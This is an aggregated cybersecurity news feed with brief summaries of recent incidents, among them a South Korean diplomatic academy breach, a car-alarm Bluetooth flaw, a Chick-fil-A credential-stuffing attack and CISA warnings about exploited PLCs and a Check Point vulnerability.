South Korea discloses data breach impacting diplomats worldwide
South Korea discloses data breach impacting diplomats worldwide South Korea disclosed that hackers breached the National Diplomatic Academy’s online education system for ten months and stole personal information belonging to current and former employees of the Ministry of Foreign Affairs (MFA), including overseas diplomats. […] Bill Toulas Go to bleepingcomputer
-
Bluetooth Vulnerability Exposes 2.2 Million Cars to Remote Unlock and Immobilization Attacks
Bluetooth Vulnerability Exposes 2.2 Million Cars to Remote Unlock and Immobilization Attacks A recently disclosed Bluetooth vulnerability in the aftermarket KARR Security System exposes approximately 2.2 million vehicles to remote attacks that could allow unauthorized door unlocking, alarm control, and vehicle immobilization. This issue, uncovered by researchers at the University of California, San Diego, highlights…
-
July 2026 InfraTrust Report Flags 26 Unauthenticated Vulnerabilities and Exploited SonicWall Flaws
July 2026 InfraTrust Report Flags 26 Unauthenticated Vulnerabilities and Exploited SonicWall Flaws A new infrastructure security review has exposed a busy month for defenders. Fourteen infrastructure vendors issued 61 relevant advisories worldwide during the 30 days ending July 17, including 26 flaws that attackers can reach remotely without logging in. Six advisories carried critical CVSS…
-
Chick-fil-A Urges Customers to Change Chick-fil-A One Passwords After Unauthorized Access
Chick-fil-A Urges Customers to Change Chick-fil-A One Passwords After Unauthorized Access Chick-fil-A has warned customers to update their Chick-fil-A One passwords after detecting unauthorized access to a subset of loyalty accounts during a credential stuffing attack in June 2026. After conducting an internal investigation, the company confirmed that attackers used an automated credential stuffing attack…
-
CISA Warns Iran-Linked Hackers Exploit Rockwell PLCs to Disrupt U.S. Critical Infrastructure
CISA Warns Iran-Linked Hackers Exploit Rockwell PLCs to Disrupt U.S. Critical Infrastructure Iran-linked hackers are targeting internet-connected industrial controllers used across U.S. critical infrastructure. The campaign has disrupted programmable logic controllers, or PLCs, in government, water, wastewater, and energy facilities. Some victims suffered operational disruption and financial losses after attackers altered the systems that manage…
-
CISA Warns of Check Point Authentication Vulnerability Actively Exploited in the Wild
CISA Warns of Check Point Authentication Vulnerability Actively Exploited in the Wild The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical authentication vulnerability in Check Point SmartConsole that is actively being exploited in the wild, prompting organizations to take immediate defensive action. Tracked as CVE-2026-16232, the flaw affects…
-
Brazilian Banking Trojan Actively Spreading in Portugal
Brazilian Banking Trojan Actively Spreading in Portugal Portuguese businesses operate in the same native language as Brazilian hackers, making those businesses easy targets. Nate Nelson Go to gbhackers.com